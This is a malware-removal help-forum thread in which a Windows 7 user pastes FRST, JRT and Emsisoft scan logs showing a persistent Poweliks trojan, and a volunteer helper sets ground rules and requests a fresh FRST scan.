FirewallRules: [UDP Query User{207FEB91-B9A5-48B7-86A9-1B8C55CB59E8}D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe] => D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe
FirewallRules: [{0B28010B-E6EB-4914-9602-14B85B47BD0A}] => D:\games\steamapps\common\OrcsMustDieUnchained\Dashboard\Bin\SpitfireDashboard.exe
FirewallRules: [{0B7D03F1-7CD7-49EA-8100-E067E1CBF775}] => D:\games\steamapps\common\OrcsMustDieUnchained\Dashboard\Bin\SpitfireDashboard.exe
FirewallRules: [{696C9629-827E-4155-955C-C1919A04FE08}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{AF5ABC92-FB52-495A-ADCD-0366FF705885}] => D:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{A86F1E41-8D1F-40A3-A741-326F0AEE90C7}] => D:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{F972FF74-D54F-4C7F-9214-76ECCCEBA030}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{BD2FD94E-29B1-42E5-A756-691E367F12B9}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{2FEB6DCD-2A28-415D-9764-09C8BE698A12}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{73DC3B85-C79F-4B96-B005-DEC5AC0395C7}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{86505221-0E2B-4301-9D80-F6C2B536D2DF}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{2E9E731D-DD51-49DC-B01C-DFD123595AA3}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{DB98E247-2B23-4A52-86AE-1C2E17CFED31}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{4E3E9E73-8872-46B7-9E5F-05C0D08958D2}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{74E0CFD0-3E9A-425F-80F1-4307641B2819}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{EB73B562-EB9A-4B5D-AFDF-44D2C35FEA1C}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{9EABB9A8-1A38-4776-AF17-79DCB5A4EFBF}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{D173BC0F-9B67-4460-ABEC-8743D7190C0A}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{C46A0005-052C-4055-AA89-D74BA356E1B7}] => D:\games\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{27C5C39B-B9A3-4CE5-9C98-2D59F179B915}] => D:\games\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{92477BDF-B603-4B87-812A-AD3BEB137A50}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{90462001-694A-485A-B60D-BDA7B73B61EE}] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{E007AF0C-9BCA-4113-B752-BF0A93A5BFDC}] => D:\Program Files\iTunes\iTunes.exe
 
==================== Restore Points =========================
 
05-01-2017 01:51:29 Scheduled Checkpoint
07-01-2017 21:48:44 JRT Pre-Junkware Removal
08-01-2017 10:12:45 JRT Pre-Junkware Removal
08-01-2017 11:08:03 Malwarebytes Anti-Rootkit Restore Point
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/08/2017 02:53:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (01/08/2017 02:53:33 PM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
Error: (01/08/2017 02:47:53 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (01/08/2017 02:47:51 PM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
Error: (01/08/2017 01:30:48 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 8018
 
Error: (01/08/2017 01:30:48 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 8018
 
Error: (01/08/2017 01:30:48 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (01/08/2017 01:30:47 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 7020
 
Error: (01/08/2017 01:30:47 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 7020
 
Error: (01/08/2017 01:30:47 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
 
System errors:
=============
Error: (01/08/2017 01:30:49 PM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/08/2017 10:32:37 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {995C996E-D918-4A8C-A302-45719A6F4EA7} did not register with DCOM within the required timeout.
 
Error: (01/07/2017 10:19:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Bluetooth Service service failed to start due to the following error: 
The pipe has been ended.
 
Error: (01/07/2017 10:19:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Apple Mobile Device Service service failed to start due to the following error: 
The pipe has been ended.
 
Error: (01/07/2017 10:19:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Print Spooler service failed to start due to the following error: 
The service did not start due to a logon failure.
 
Error: (01/07/2017 10:19:44 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The Spooler service was unable to log on as NT AUTHORITY\SYSTEM with the currently configured password due to the following error: 
The request is not supported.
 
 
To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).
 
Error: (01/07/2017 10:19:35 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
 
Module Path: C:\Windows\System32\bcmihvsrv64.dll
 
Error: (01/07/2017 10:19:35 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
 
Module Path: C:\Windows\System32\bcmihvsrv64.dll
 
Error: (01/07/2017 10:19:34 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
 
Module Path: C:\Windows\System32\bcmihvsrv64.dll
 
Error: (01/07/2017 10:18:46 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Dell Data Vault service terminated unexpectedly.  It has done this 1 time(s).
 
 
CodeIntegrity:
===================================
  Date: 2016-10-19 19:50:59.497
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:46:47.045
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:38:23.578
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:36:25.888
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:27:18.727
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:26:15.009
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:25:57.388
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:23:04.654
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:18:47.014
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:17:43.089
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-6700K CPU @ 4.00GHz
Percentage of memory in use: 20%
Total physical RAM: 24514.78 MB
Available physical RAM: 19515.5 MB
Total Virtual: 49027.75 MB
Available Virtual: 43327.8 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:226.7 GB) (Free:63.03 GB) NTFS
Drive d: (DATAPART1) (Fixed) (Total:1863.01 GB) (Free:1644.87 GB) NTFS
Drive y: (RECOVERY) (Fixed) (Total:11.73 GB) (Free:3.17 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 1EAA813D)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or Vista) (Size: 238.5 GB) (Disk ID: 567A488E)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=11.7 GB) - (Type=27)
Partition 3: (Not Active) - (Size=226.7 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================
 
 
 

and a screenshot of Malwarebites saying it's still there after all that fun runabouts. 

 

Help?!

I'll be here trying, at least until I rage quit. Thank you!

 

Attached Files



BC AdBot (Login to Remove)

 


#2 RedArach

RedArach
  • Topic Starter

  • Members
  • 24 posts
  • OFFLINE
  •  

Posted 08 January 2017 - 07:32 PM

Latest JRT:

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.0 (12.05.2016)
Operating System: Windows 7 Professional x64 
Ran by Owner (Administrator) on Sun 01/08/2017 at 16:27:42.05
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 9 
 
Successfully deleted: C:\Windows\system32\Tasks\PCDEventLauncherTask (Task)
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4OO6WVDK (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7OPIYFE0 (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A10CTGEK (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QKDDG85O (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4OO6WVDK (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7OPIYFE0 (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A10CTGEK (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QKDDG85O (Temporary Internet Files Folder) 
 
 
 
Registry: 0 


#3 RedArach

RedArach
  • Topic Starter

  • Members
  • 24 posts
  • OFFLINE
  •  

Posted 08 January 2017 - 08:07 PM

EEK Log:

 

Emsisoft Emergency Kit - Version 12.0
Scan log
 
Date Scan Method Objects Scanned Objects Detected Duration Type Computer Name
1/8/2017 5:03:45 PM Malware 88383 3 0:00:36 Manual scan OWNER-PC


#4 RedArach

RedArach
  • Topic Starter

  • Members
  • 24 posts
  • OFFLINE
  •  

Posted 08 January 2017 - 08:33 PM

EEK says it's still  here, same luck as I've had with Malwarebytes.  

 

 

Emsisoft Emergency Kit - Version 12.0
Last update: 1/8/2017 5:03:19 PM
User account: Owner-PC\Owner
Computer name: OWNER-PC
OS version: Windows 7x64 Service Pack 1
 
Scan settings:
 
Scan type: Malware Scan
Objects: Rootkits, Memory, Traces, Files
 
Detect PUPs: On
Scan archives: Off
ADS Scan: On
File extension filter: Off
Direct disk access: Off
 
Scan start: 1/8/2017 5:20:04 PM
C:\Users\Owner\AppData\Local\c345b\a0f5a.bat detected: Trojan.BAT.Poweliks.Gen (B) [krnl.xmd]
C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4d3bf.lnk detected: Exploit.Poweliks.Gen.2 (B) [krnl.xmd]
C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\385b6.lnk detected: Exploit.Poweliks.Gen.1 (B) [krnl.xmd]
 
Scanned 149111
Found 3
 
Scan end: 1/8/2017 5:20:42 PM
Scan time: 0:00:38


#5 RedArach

RedArach
  • Topic Starter

  • Members
  • 24 posts
  • OFFLINE
  •  

Posted 08 January 2017 - 08:36 PM

Oh for the love of ... the smiley smirks are supposed to be ( B )   

 

lol 



#6 RedArach

RedArach
  • Topic Starter

  • Members
  • 24 posts
  • OFFLINE
  •  

Posted 08 January 2017 - 10:19 PM

Ran EEK, RKLL and Malwarebytes one more time, restarted in safe mode, and apparently that finally did the trick.  No idea why. But, I'll take it!   :lmao:



#7 RedArach

RedArach
  • Topic Starter

  • Members
  • 24 posts
  • OFFLINE
  •  

Posted 09 January 2017 - 04:18 PM

Stands corrected.. just because Malware says it ain' there, don' mean a thing.  :killcomp:

  Thus far, no response from BullGuard on what to do about this. 

Attached Files



#8 RedArach

RedArach
  • Topic Starter

  • Members
  • 24 posts
  • OFFLINE
  •  

Posted 10 January 2017 - 05:03 AM

still no workaround working, and silence from BullGuard. help...? :blush:



#9 Bezukhov

Bezukhov

    Bleepin' Jazz Fan!


  • Members
  • 2,618 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Providence, R.I.
  • Local time:01:30 PM

Posted 10 January 2017 - 05:26 PM

I'd like to look into this.

First, what did you do to generate that shortcut list? Are there any in it that you don't recognize?

Second, some ground rules.
  • Please do not run any tools on your own while we solve this. Some are rather powerful, and using one at the wrong moment can have catastrophic effects. Also please refrain from seeking help for this problem elsewhere. Too many cooks spoils the broth.
  • Next, it is important that the instructions given be performed in the order given. We may need one tool to finish its job before another one starts.
  • If at any time my instructions are not clear stop and ask for clarification.
  • Rather than attach any logs to your post it is better that you copy and paste them instead, except if instructed otherwise.
  • Any program that I ask you run should only be run once.
  • As soon as your computer is clean I will let you know.
  • Please try to complete any tasks and reply in 24 to 48 hours. I will try to do likewise. In the interest of full disclosure I am still a student, and therefore anything I propose must be cleared with an instructor, which may sometimes delay my responses. The upside to this is you'll have two heads looking into your problem.
  • Lastly, do not make any changes to your computer from here on out until you get an "All Clear" from me.
Last, please run Farbar Recovery Scan Tool again.
  • Right-click FRST then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.
Note 2: The first time the tool is run it generates another log (Addition.txt - also located in the same directory the tool was run from). Please also paste that, along with the FRST.txt into your next reply.

Please post both logs.
To err is Human. To blame it on someone else is even more Human.

#10 RedArach

RedArach
  • Topic Starter

  • Members
  • 24 posts
  • OFFLINE
  •  

Posted 10 January 2017 - 06:13 PM

I realize that's a lot of text to scan thru, shortcuts are part of the FRST scans.  

   I just find it weird that the file is in the Registry, but BullGuard insists that it's still in there.  

 I'll run the FRST again in a second and post the results after. Thank you for getting back to me. 



#11 Bezukhov

Bezukhov

    Bleepin' Jazz Fan!


  • Members
  • 2,618 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Providence, R.I.
  • Local time:01:30 PM

Posted 10 January 2017 - 06:16 PM

I realize that's a lot of text to scan thru, shortcuts are part of the FRST scans.  
   I just find it weird that the file is in the Registry, but BullGuard insists that it's still in there.  
 I'll run the FRST again in a second and post the results after. Thank you for getting back to me.


No, I can handle it. Sorry for my brain freezing up. I totally forgot FRST had a shortcut feature.
To err is Human. To blame it on someone else is even more Human.

#12 RedArach

RedArach
  • Topic Starter

  • Members
  • 24 posts
  • OFFLINE
  •  

Posted 10 January 2017 - 07:12 PM

No problem! If it was for brain freezes, we probably wouldn't be having this conversation ^^; lol


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 08-01-2017
Ran by Owner (administrator) on OWNER-PC (10-01-2017 16:08:32)
Running from C:\Users\Owner\Downloads
Loaded Profiles: Owner (Available Profiles: Owner)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvscpapisvr.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Waves Audio Ltd.) C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Microsoft Corporation) C:\Windows\System32\wisptis.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Dell Inc.) C:\Program Files\Dell\DW WLAN Card\WLTRYSVC.EXE
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Dell Inc.) C:\Program Files\Dell\DW WLAN Card\BCMWLTRY.EXE
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(BullGuard Ltd.) C:\Program Files\BullGuard Ltd\BullGuard\BullGuardBhvScanner.exe
(BullGuard Ltd.) C:\Program Files\BullGuard Ltd\BullGuard\BullGuardScanner.exe
(BullGuard Ltd.) C:\Program Files\BullGuard Ltd\BullGuard\BullGuardUpdate.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(Malwarebytes) D:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\Windows\System32\wisptis.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Waves Audio Ltd.) C:\Program Files\Waves\MaxxAudio\WavesSvc64.exe
(Dell Inc.) C:\Program Files\Dell\DW WLAN Card\WLTRAY.EXE
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Malwarebytes) D:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Apple Inc.) D:\Program Files\iTunes\iTunesHelper.exe
(BullGuard Ltd.) C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe
(Valve Corporation) D:\games\Steam.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TabletUser.exe
(Microsoft Corporation) C:\Windows\System32\StikyNot.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Wacom Technology) C:\Program Files\Tablet\Wacom\WacomHost.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe
(Valve Corporation) D:\games\bin\cef\cef.win7\steamwebhelper.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
(Valve Corporation) D:\games\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Logitech Inc.) D:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
(Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DellDataVaultWiz.exe
(Dell Inc.) C:\Program Files (x86)\Dell Update\DellUpService.exe
(Dell Inc.) C:\Program Files (x86)\Dell Update\DellUpTray.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe
(Dell Inc.) C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DellDataVault.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFS.Common.Agent.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\DBRUpdate\DBRUpd.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Toaster.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRSync.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(PC-Doctor, Inc.) C:\Program Files\Dell\SupportAssist\imstrayicon.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8484056 2015-06-12] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_MAXX6] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1393880 2015-04-28] (Realtek Semiconductor)
HKLM\...\Run: [WavesSvc] => C:\Program Files\Waves\MaxxAudio\WavesSvc64.exe [611248 2015-04-19] (Waves Audio Ltd.)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [322472 2015-06-23] (Intel Corporation)
HKLM\...\Run: [Broadcom Wireless Manager UI] => C:\Program Files\Dell\DW WLAN Card\WLTRAY.exe [8927232 2015-12-22] (Dell Inc.)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2397120 2016-06-14] (NVIDIA Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Malwarebytes TrayApp] => D:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2776528 2016-12-14] (Malwarebytes)
HKLM\...\Run: [iTunesHelper] => D:\Program Files\iTunes\iTunesHelper.exe [176440 2016-12-06] (Apple Inc.)
HKLM\...\Run: [BullGuard] => C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe [1464088 2016-12-12] (BullGuard Ltd.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [296216 2015-06-15] (Intel Corporation)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [9080768 2016-11-15] (AVAST Software)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-08-24] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [LWS] => D:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [204136 2012-09-12] (Logitech Inc.)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [25779624 2016-12-21] (Dropbox, Inc.)
Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist Corporate\1165\G2AWinLogon_x64.dll [X]
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\Run: [Steam] => D:\games\steam.exe [2876704 2016-12-19] (Valve Corporation)
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-13] (Microsoft Corporation)
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2016-11-17] (Apple Inc.)
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\MountPoints2: {a72e9c2d-c934-11e5-855b-c48e8ffd48f0} - J:\VerizonWirelessUpgradeAssistantSetup.exe -a
